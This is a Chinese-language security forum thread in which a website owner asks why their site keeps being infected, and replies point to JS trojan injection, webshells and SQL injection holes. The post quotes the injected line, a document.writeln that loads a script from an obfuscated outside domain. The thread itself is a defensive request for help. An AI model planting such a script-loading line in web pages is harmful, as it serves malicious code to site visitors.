瑞星卡卡安全论坛技术交流区入侵防御(HIPS) 能不能帮我分析一下我的网站是怎么中毒的。谢谢。

1   1  /  1  页   跳转

能不能帮我分析一下我的网站是怎么中毒的。谢谢。

能不能帮我分析一下我的网站是怎么中毒的。谢谢。

能不能帮我分析一下我的网站是怎么中毒的。谢谢。
经常会被别人挂了所谓的木马
经常在我的js文件后面加上
类似下面的文件
document.writeln ("<script src=\"http://a33d.9966%2Eorg/32.js\"><\/script>");
下面是这三天的Log。
但应该是25号被挂的。
实在没有办法了。从年前到现在已经被挂了十多二十次了。
每次被旧的js文件上传之后过不了几天又被挂了。
麻烦各位帮一下了。谢谢。
http://ls168.cn/ex090824.txt
http://ls168.cn/ex090825.txt
http://ls168.cn/ex090826.txt


用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; InfoPath.1; TheWorld)
分享到:
gototop
 

回复 1F sugaroar 的帖子

网站服务器被弄后门了吧,建议将杀毒软件升级到最新版全盘杀毒,一般有可能黑客会上传一个asp后门页面混杂在正常页面中,建议lz自行检查一下。检查网页源代码是否有sqlinjection漏洞,对于数据库一些关键的查询、删除、更新等语句是否有严格过滤。尤其检查一下页面和数据库交互如果代码有漏洞,很容易被入侵。
gototop
 

回复:能不能帮我分析一下我的网站是怎么中毒的。谢谢。

这个是js挂马,js文件就是http://a33d.9966%2Eorg/32.js,而至于说经常被挂马,估计是你的网站存在漏洞了,被入侵过,从而控制了服务器,或者拥有了你网站的webshell。
建议1、先检查webshell,对网站文件进行检查,可以采用相关工具,删掉没必要的可疑的网页文件,如1.asp这样名字的;
2、修补服务器的漏洞,检查管理帐户,特别是隐藏帐户,删除不必要帐号,采取相关措施增强安全性
gototop
 

回复: 能不能帮我分析一下我的网站是怎么中毒的。谢谢。

水印么?论坛有很多教程的呀。搜索一下就找到了
gototop
 
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT